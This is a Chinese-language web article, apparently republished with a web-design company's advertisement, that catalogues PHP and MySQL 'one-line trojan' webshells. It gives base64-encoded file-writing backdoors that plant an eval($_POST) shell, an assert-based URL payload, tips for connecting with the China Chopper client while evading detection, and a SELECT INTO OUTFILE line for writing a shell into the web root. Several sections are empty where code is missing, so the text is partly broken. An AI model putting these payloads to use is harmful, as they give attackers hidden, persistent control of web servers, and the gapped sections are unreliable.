這篇文章主要為大家展示了“PHP與SQL語句之木馬的示例分析”，內(nèi)容簡而易懂，條理清晰，希望能夠幫助大家解決疑惑，下面讓小編帶領(lǐng)大家一起研究并學(xué)習(xí)一下“PHP與SQL語句之木馬的示例分析”這篇文章吧。

創(chuàng)新互聯(lián)建站是一家專業(yè)提供遼源企業(yè)網(wǎng)站建設(shè),專注與成都做網(wǎng)站、網(wǎng)站制作、成都外貿(mào)網(wǎng)站建設(shè)、H5網(wǎng)站設(shè)計(jì)、小程序制作等業(yè)務(wù)。10年已為遼源眾多企業(yè)、政府機(jī)構(gòu)等服務(wù)。創(chuàng)新互聯(lián)專業(yè)的建站公司優(yōu)惠進(jìn)行中。

一、基礎(chǔ)類的一句話--功能僅限于驗(yàn)證漏洞了，實(shí)際中非常容易被查出出來：

二、編碼的替換的類型：

//會生成

 

@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));

//php在html內(nèi)部的一種嵌入方式

 



 

 

三、其他類型：

//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

   //菜刀連接 躲避檢測 密碼pass 



//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 腳本類型:php 密碼為 pass

四、下載類型：

 

 //顯示某文件

 //運(yùn)行遠(yuǎn)程shell

五、無關(guān)鍵函數(shù)類型：

http://site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass

六、補(bǔ)充知識點(diǎn)：

SQL寫一句話（MySQL）：

select "" into outfile "/home/webaccount/projectname/www/*.php"

#前面是一句話內(nèi)容 后面是絕對路徑www下的PHP文件，同理其他腳本也可以

以上是“PHP與SQL語句之木馬的示例分析”這篇文章的所有內(nèi)容，感謝各位的閱讀！相信大家都有了一定的了解，希望分享的內(nèi)容對大家有所幫助，如果還想學(xué)習(xí)更多知識，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道！

分享標(biāo)題：PHP與SQL語句之木馬的示例分析-創(chuàng)新互聯(lián)
網(wǎng)站地址：http://weahome.cn/article/dojcgh.html